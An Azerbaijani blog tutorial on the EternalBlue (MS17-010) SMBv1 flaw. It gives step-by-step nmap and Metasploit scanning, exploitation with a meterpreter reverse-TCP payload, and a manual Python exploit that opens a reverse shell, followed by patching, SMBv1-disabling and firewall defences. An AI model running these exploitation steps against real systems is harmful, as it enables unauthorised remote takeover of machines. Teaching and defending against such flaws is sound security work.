EternalBlue Exploit (MS17-010) | Vulnerability

Başlıq: EternalBlue Exploit (MS17-010) – Texniki Analiz və İstifadə Qaydası

1. Giriş

EternalBlue, Microsoft-un SMBv1 protokolundakı MS17-010 adlı kritik bir zəiflikdən istifadə edən exploit-dir. Bu zəiflik Remote Code Execution (RCE) imkanı yaradaraq təcavüzkarın sistemə tam nəzarət etməsinə şərait yaradır. 2017-ci ildə WannaCry və NotPetya hücumları bu exploit-dən istifadə edərək milyonlarla cihazı yoluxdurmuşdur.

Bu məqalədə EternalBlue zəifliyinin texniki detalları, zəif sistemlərin aşkar edilməsi və Metasploit ilə exploit edilməsi haqqında danışacağıq.


2. MS17-010 Zəifliyinin Texniki İzahı

MS17-010 zəifliyi, Server Message Block (SMB) protokolunun versiya 1 (SMBv1) interfeysində yerləşir.

Zəifliyin əsas səbəbi:

  • SMB-də pool corruption (yaddaşda səhv yerləşdirmə) səbəbindən buffer overflow baş verir.
  • Bu, kod icrasına və SYSTEM səviyyəsində icazələr əldə etməyə imkan yaradır.

Zəiflikdən istifadə edərək necə hücum edilir?

  1. SMB Transaction (Trans2) Request göndərilir.
  2. Ölçü limiti aşan xüsusi hazırlanmış paketlər ilə yaddaş pozulur.
  3. Kernel səviyyəsində icra icazəsi əldə edilir.

SMB zəifliklərinin aşkar edilməsi üçün aşağıdakı portlar açıq olmalıdır:

  • TCP 445 (SMB üçün əsas port)
  • TCP 139 (NetBIOS ilə birlikdə işləyə bilər)

3. MS17-010 Zəif Sistemləri Aşkar Etmək

3.1. Nmap İstifadə edərək Skanning

Nmap istifadə edərək zəif sistemləri aşkar etmək mümkündür:

nmap -p445 --script smb-vuln-ms17-010 192.168.1.0/24

Əgər hədəf sistemdə zəiflik varsa, nəticə aşağıdakı kimi görünəcək:

Host is likely VULNERABLE to MS17-010!

3.2. Metasploit ilə Skanning

Metasploit Framework-də zəif sistemləri aşkar etmək üçün auxiliary scanner istifadə edilir.

Metasploit-i başladın:

msfconsole

Zəiflik skannerini seçin:

use auxiliary/scanner/smb/smb_ms17_010

Hədəfi təyin edin:

set RHOSTS 192.168.1.10

Skanneri işə salın:

run

Əgər sistem zəifdirsə, aşağıdakı nəticəni alacaqsınız:

[+] 192.168.1.10:445 - Host is likely VULNERABLE to MS17-010!

4. EternalBlue Exploit Edilməsi

4.1. Metasploit ilə Exploit

Addım 1: Metasploit-i başladın:

msfconsole

Addım 2: EternalBlue exploit modulunu seçin:

use exploit/windows/smb/ms17_010_eternalblue

Addım 3: Hədəf IP-ni təyin edin:

set RHOSTS 192.168.1.10

Addım 4: Payload seçin (reverse shell üçün):

set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.5
set LPORT 4444

Addım 5: Exploit-i işə salın:

exploit

Əgər exploit uğurla yerinə yetirilərsə, sistemə meterpreter shell ilə daxil olacaqsınız:

meterpreter >

4.2. Manual Exploit (Python ilə)

Metasploit olmadan EternalBlue exploit etmək üçün Python exploit kodları da istifadə edilə bilər.

Exploit üçün hazırlıq:

git clone https://github.com/worawit/MS17-010.git
cd MS17-010

Hədəfi yoxlamaq:

python checker.py 192.168.1.10

EternalBlue exploit çalışdırmaq:

python eternalblue_exploit.py 192.168.1.10 shellcode.bin

Shellcode işlədikdə reverse shell açılacaq və sistemə giriş əldə edəcəksiniz.


5. SMB Server Konfiqurasiyasını Yoxlamaq və Bağlamaq

SMB versiyasını yoxlamaq (Linux və Windows)

Linux-da SMB versiyalarını yoxlamaq üçün:

smbclient -L \\192.168.1.10 -U ""

Windows-da aşağıdakı komanda ilə SMB versiyasını deaktiv edə bilərsiniz:

Set-SmbServerConfiguration -EnableSMB1Protocol $false -Force

Firewall Qaydaları ilə SMB Bağlamaq

Windows-da aşağıdakı PowerShell əmri ilə SMB portlarını bağlaya bilərsiniz:

New-NetFirewallRule -DisplayName "Block SMB" -Direction Inbound -Protocol TCP -LocalPort 445 -Action Block

6. EternalBlue-dən Qorunma Yolları

6.1. Yeniləmələri Tətbiq Etmək

Microsoft MS17-010 üçün təhlükəsizlik yeniləməsi buraxmışdır. Sisteminizi qorumaq üçün yeniləmələri tətbiq edin:

  • Windows 7: KB4012212 / KB4012215
  • Windows 8 və sonrası üçün SMBv1 deaktiv edilməlidir.

6.2. SMBv1-i tamamilə deaktiv etmək

PowerShell ilə SMBv1-i deaktiv edin:

Disable-WindowsOptionalFeature -Online -FeatureName smb1protocol

6.3. Firewall İstifadə Etmək

Windows Defender Firewall və ya üçüncü tərəf firewall alətləri ilə TCP 445 və 139 portlarını bağlayın.

6.4. IDS/IPS Sistemlərdən İstifadə Etmək

Snort və Suricata kimi Intrusion Detection System (IDS) alətləri ilə şəbəkənizdə EternalBlue exploit cəhdlərini aşkar edə bilərsiniz.


7. Nəticə

EternalBlue SMBv1-in zəif dizaynı səbəbindən çox təhlükəli bir exploit-dir və bu gün də bir çox köhnə sistemləri təsir edir. Bu məqalədə zəifliyin texniki detalları, aşkar edilməsi və Metasploit ilə exploit edilməsi haqqında danışdıq. Bu tip zəifliklərdən qorunmaq üçün sistemlər daim yenilənməli və SMBv1 deaktiv edilməlidir.

EternalBlue kimi zəifliklər real hücumlarda geniş istifadə olunduğundan, təhlükəsizlik tədbirlərini görmək vacibdir.

Bir cavab yazın

Sizin e-poçt ünvanınız dərc edilməyəcəkdir. Gərəkli sahələr * ilə işarələnmişdir